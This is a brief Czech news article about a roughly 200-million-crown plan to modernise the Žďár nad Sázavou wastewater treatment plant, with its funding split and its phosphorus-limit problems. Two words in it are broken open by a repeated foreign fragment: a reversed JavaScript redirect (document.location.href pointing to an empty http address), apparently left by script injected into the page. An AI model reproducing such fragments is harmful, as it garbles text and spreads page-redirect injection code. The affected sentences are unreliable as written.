Rainbow page separator

Žďár po letech chystá modernizaci čistírny odpadních vod

Sobota, 28. září 2019

Žďár nad Sázavou / Na zhruba dvě stě milionů korun by měla vyjít modernizace žďárské čistírny odpadních vod. Dojde tím k navýšení její kapacity a pořízení nových technologií, čímž se rovněž zlepší čis[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tota vody vypouštěné do řeky Sázavy a sníží se energetická náročnost provozu.
Přibližně šedesát procent financí by žďárská radnice mohla získat prostřednictvím dotace ze Státního fondu životního prostředí. O náklady na modernizaci se podělí Svaz vodovodů a kanalizací Žďársko, Žďár nad Sázavou a obce Hamry nad Sázavou a Polnička, které jsou na čističku napojené. Žďárští radní už před dvěma roky odhlasovali, že měs[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ze svého rozpočtu na čističku přispěje maximálně čtyřiceti miliony korun.
Čistírna odpadních vod prošla kompletní modernizací před bezmála dvěma desetiletími. Nyní už zařízení ve špičkách s ohledem na svoji kapacitu nedostačuje, navíc vzhledem ke stále přísnější legislativě by v budoucnu mohlo dojít na pokuty za vypouštění nedočištěných odpadních vod. Již dříve se objevil problém s občasným překročením limitu vypouštěného fosforu.